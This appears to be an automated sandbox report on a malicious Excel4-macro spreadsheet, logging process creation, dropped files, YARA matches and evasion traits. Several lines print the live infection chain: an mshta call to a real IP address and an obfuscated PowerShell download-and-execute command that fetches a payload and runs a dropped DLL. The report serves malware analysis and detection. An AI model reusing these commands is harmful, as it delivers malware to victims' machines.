                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00227C3713_2_00227C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023F43513_2_0023F435
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023AC3A13_2_0023AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00223E3F13_2_00223E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00240E3A13_2_00240E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023000113_2_00230001
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023860613_2_00238606
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00240C1413_2_00240C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022481613_2_00224816
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00225E6013_2_00225E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023A66613_2_0023A666
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023AE6D13_2_0023AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023907F13_2_0023907F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00236C4913_2_00236C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00230E5313_2_00230E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0024005613_2_00240056
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022205113_2_00222051
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022225113_2_00222251
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00221A5613_2_00221A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00224C5D13_2_00224C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002270B313_2_002270B3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022EE8113_2_0022EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023188913_2_00231889
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022F09B13_2_0022F09B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022EA9913_2_0022EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002264E213_2_002264E2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00224EE313_2_00224EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023A2E813_2_0023A2E8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00239EEC13_2_00239EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023DCF713_2_0023DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022AEFB13_2_0022AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022B2C713_2_0022B2C7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00235CC413_2_00235CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002366CA13_2_002366CA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022E2CC13_2_0022E2CC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023DEDC13_2_0023DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023BB2313_2_0023BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00226D2413_2_00226D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022773513_2_00227735
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00240F3313_2_00240F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00228B3D13_2_00228B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022971413_2_00229714
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023851913_2_00238519
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00230B1913_2_00230B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022536113_2_00225361
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023176B13_2_0023176B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022896913_2_00228969
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022BB7E13_2_0022BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022434613_2_00224346
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022CF4713_2_0022CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023894B13_2_0023894B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022554813_2_00225548
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022B74D13_2_0022B74D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023255013_2_00232550
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023CB5B13_2_0023CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022A55F13_2_0022A55F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0023C3A013_2_0023C3A0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00237BA613_2_00237BA6
                            Source: 476C.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                            Source: CJ68000754184.xlsMacro extractor: Sheet name: REEEEEEEE
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022E249 DeleteService,13_2_0022E249
                            Source: CJ68000754184.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\CJ68000754184.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Jssipnq\
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100359C1 appears 46 times
                            Source: CJ68000754184.xlsOLE indicator, VBA macros: true
                            Source: CJ68000754184.xls.0.drOLE indicator, VBA macros: true
                            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@21/9@2/48
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
                            Source: CJ68000754184.xlsOLE indicator, Workbook stream: true
                            Source: CJ68000754184.xls.0.drOLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,9_2_100125C0
                            Source: CJ68000754184.xlsVirustotal: Detection: 13%
                            Source: CJ68000754184.xlsReversingLabs: Detection: 18%
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE436.tmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: Binary string: >ystem.pdbW source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: 476C.tmp.0.drInitial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_038808D0 push 8B49032Eh; iretd 4_3_038808D5
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_038800BE push 8B49032Eh; iretd 4_3_038800C4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10032B7D push ecx; ret 9_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030DFF push ecx; ret 9_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10032B7D push ecx; ret 12_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10030DFF push ecx; ret 12_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: JooSee.dll.6.drStatic PE information: real checksum: 0x8df98 should be: 0x9130d
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dll
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn (copy)

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100134F0 IsIconic,9_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,9_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_100134F0 IsIconic,12_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,12_2_10018C9A
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exe TID: 1976Thread sleep time: -360000s >= -30000sJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_9-32093
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_12-32090
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                            Source: rundll32.exe, 0000000D.00000002.620246507.00000000006FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,9_2_10030334
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,12_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00694087 mov eax, dword ptr fs:[00000030h]9_2_00694087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00384087 mov eax, dword ptr fs:[00000030h]10_2_00384087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001C4087 mov eax, dword ptr fs:[00000030h]12_2_001C4087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00234087 mov eax, dword ptr fs:[00000030h]13_2_00234087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00314087 mov eax, dword ptr fs:[00000030h]14_2_00314087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00404087 mov eax, dword ptr fs:[00000030h]15_2_00404087
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,9_2_10002280
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,9_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,9_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1003ACCC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,12_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,12_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_1003ACCC
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.htmlJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqqJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqqJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVvJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYsJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServerJump to behavior
                            Source: Yara matchFile source: CJ68000754184.xls, type: SAMPLE
                            Source: Yara matchFile source: C:\Users\user\Desktop\CJ68000754184.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,9_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,9_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,9_2_10014B71
